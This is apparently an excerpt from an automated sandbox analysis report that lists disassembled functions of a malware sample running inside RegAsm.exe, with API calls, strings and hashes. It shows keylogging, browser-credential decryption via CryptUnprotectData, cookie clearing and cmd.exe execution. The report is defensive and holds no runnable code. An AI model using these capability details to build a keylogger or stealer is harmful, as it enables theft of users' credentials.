                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventLocalTimewsprintf
                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                • API String ID: 1497725170-1359877963
                                                                • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                • String ID: Online Keylogger Started
                                                                • API String ID: 112202259-1258561607
                                                                • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: CryptUnprotectData$crypt32
                                                                • API String ID: 2574300362-2380590389
                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                • String ID: Connection Timeout
                                                                • API String ID: 2055531096-499159329
                                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Exception@8Throw
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 2005118841-1866435925
                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                • String ID: bad locale name
                                                                • API String ID: 3628047217-1405518554
                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                • String ID: !D@
                                                                • API String ID: 186401046-604454484
                                                                • Opcode ID: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                • Opcode Fuzzy Hash: 66a4db702971166e51169c96c42166a39a03490b62fdad1c1d9be1af324f9392
                                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: /C $cmd.exe$open
                                                                • API String ID: 587946157-3896048727
                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                • String ID: pth_unenc
                                                                • API String ID: 3123878439-4028850238
                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetCursorInfo$User32.dll
                                                                • API String ID: 1646373207-2714051624
                                                                • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetLastInputInfo$User32.dll
                                                                • API String ID: 2574300362-1519888992
                                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alldvrm$_strrchr
                                                                • String ID:
                                                                • API String ID: 1036877536-0
                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                • __freea.LIBCMT ref: 100087D5
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                • String ID:
                                                                • API String ID: 2652629310-0
                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                • API String ID: 3472027048-1236744412
                                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DisplayEnum$Devices$Monitors
                                                                • String ID:
                                                                • API String ID: 1432082543-0
                                                                • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$ForegroundLength
                                                                • String ID: [ $ ]
                                                                • API String ID: 3309952895-93608704
                                                                • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
